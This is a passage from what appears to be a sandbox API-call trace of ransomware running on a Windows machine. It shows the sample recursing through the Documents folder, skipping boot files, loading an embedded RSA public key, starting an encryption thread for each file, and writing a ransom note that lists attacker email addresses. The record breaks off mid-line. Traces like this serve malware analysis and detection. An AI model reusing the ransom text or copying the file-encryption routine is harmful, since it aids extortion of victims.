(lpString1="_oHxelCBmJ.docx", lpString2="..") returned 1 [0038.499] lstrcmpW (lpString1="_oHxelCBmJ.docx", lpString2=".") returned 1 [0038.499] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0038.499] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="ntldr") returned 0x0 [0038.499] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="NTLDR") returned 0x0 [0038.499] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="NTDETECT.COM") returned 0x0 [0038.499] StrStrW (lpFirst="_oHxelCBmJ.docx", lpSrch="ntdetect.com") returned 0x0 [0038.499] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0038.499] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0038.499] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0038.499] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.499] lstrcpyW (in: lpString1=0x17cf1c, lpString2="_oHxelCBmJ.docx" | out: lpString1="_oHxelCBmJ.docx") returned="_oHxelCBmJ.docx" [0038.499] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0038.499] Sleep (dwMilliseconds=0x96) [0038.664] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0038.665] lstrcmpW (lpString1="_P_aT.odt", lpString2="..") returned 1 [0038.665] lstrcmpW (lpString1="_P_aT.odt", lpString2=".") returned 1 [0038.665] StrStrW (lpFirst="_P_aT.odt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0038.665] StrStrW (lpFirst="_P_aT.odt", lpSrch="ntldr") returned 0x0 [0038.665] StrStrW (lpFirst="_P_aT.odt", lpSrch="NTLDR") returned 0x0 [0038.665] StrStrW (lpFirst="_P_aT.odt", lpSrch="NTDETECT.COM") returned 0x0 [0038.665] StrStrW (lpFirst="_P_aT.odt", lpSrch="ntdetect.com") returned 0x0 [0038.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0038.665] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0038.665] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0038.665] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.665] lstrcpyW (in: lpString1=0x17cf1c, lpString2="_P_aT.odt" | out: lpString1="_P_aT.odt") returned="_P_aT.odt" [0038.665] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x464 [0038.665] Sleep (dwMilliseconds=0x96) [0039.035] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0039.035] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0039.035] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0039.035] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0039.035] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0039.035] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0039.035] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0039.036] SetErrorMode (uMode=0x1) returned 0x1 [0039.036] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT") returned 61 [0039.036] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0039.036] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0039.036] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x47c) returned 0x0 [0039.036] RegQueryValueExW (in: hKey=0x47c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11298, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3e11298*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0039.036] RegCloseKey (hKey=0x47c) returned 0x0 [0039.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0039.036] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0039.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0039.037] WriteFile (in: hFile=0x47c, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0039.038] CloseHandle (hObject=0x47c) returned 1 [0039.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0039.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0039.038] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0039.038] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.038] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0039.039] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2="..") returned 1 [0039.039] lstrcmpW (lpString1="lhhNd9leW5xmlXw00JFa", lpString2=".") returned 1 [0039.039] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0039.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0039.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0039.039] SetErrorMode (uMode=0x1) returned 0x1 [0039.039] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0039.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.039] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.039] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0039.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0039.039] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0039.039] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0039.039] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.039] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.039] lstrcmpW (lpString1="-tHIa9_.xls", lpString2="..") returned 1 [0039.039] lstrcmpW (lpString1="-tHIa9_.xls", lpString2=".") returned 1 [0039.039] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0039.039] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="ntldr") returned 0x0 [0039.039] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="NTLDR") returned 0x0 [0039.039] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="NTDETECT.COM") returned 0x0 [0039.039] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="ntdetect.com") returned 0x0 [0039.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0039.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0039.039] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0039.039] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.039] lstrcpyW (in: lpString1=0x17be7c, lpString2="-tHIa9_.xls" | out: lpString1="-tHIa9_.xls") returned="-tHIa9_.xls" [0039.039] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x488 [0039.040] Sleep (dwMilliseconds=0x96) [0039.255] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.255] lstrcmpW (lpString1="Gg8kaToejw.xls", lpString2="..") returned 1 [0039.255] lstrcmpW (lpString1="Gg8kaToejw.xls", lpString2=".") returned 1 [0039.255] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0039.255] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="ntldr") returned 0x0 [0039.255] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="NTLDR") returned 0x0 [0039.255] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="NTDETECT.COM") returned 0x0 [0039.255] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="ntdetect.com") returned 0x0 [0039.255] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0039.255] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0039.255] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0039.255] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.255] lstrcpyW (in: lpString1=0x17be7c, lpString2="Gg8kaToejw.xls" | out: lpString1="Gg8kaToejw.xls") returned="Gg8kaToejw.xls" [0039.255] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x490 [0039.255] WaitForSingleObject (hHandle=0x490, dwMilliseconds=0xffffffff) returned 0x0 [0039.379] Sleep (dwMilliseconds=0x96) [0039.527] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.527] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0039.527] lstrcmpW (lpString1="JDjp8wKsx5Dz.ots", lpString2="..") returned 1 [0039.527] lstrcmpW (lpString1="JDjp8wKsx5Dz.ots", lpString2=".") returned 1 [0039.527] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0039.527] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="ntldr") returned 0x0 [0039.527] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="NTLDR") returned 0x0 [0039.527] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="NTDETECT.COM") returned 0x0 [0039.527] StrStrW (lpFirst="JDjp8wKsx5Dz.ots", lpSrch="ntdetect.com") returned 0x0 [0039.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0039.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0039.527] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0039.527] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.527] lstrcpyW (in: lpString1=0x17be7c, lpString2="JDjp8wKsx5Dz.ots" | out: lpString1="JDjp8wKsx5Dz.ots") returned="JDjp8wKsx5Dz.ots" [0039.527] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS 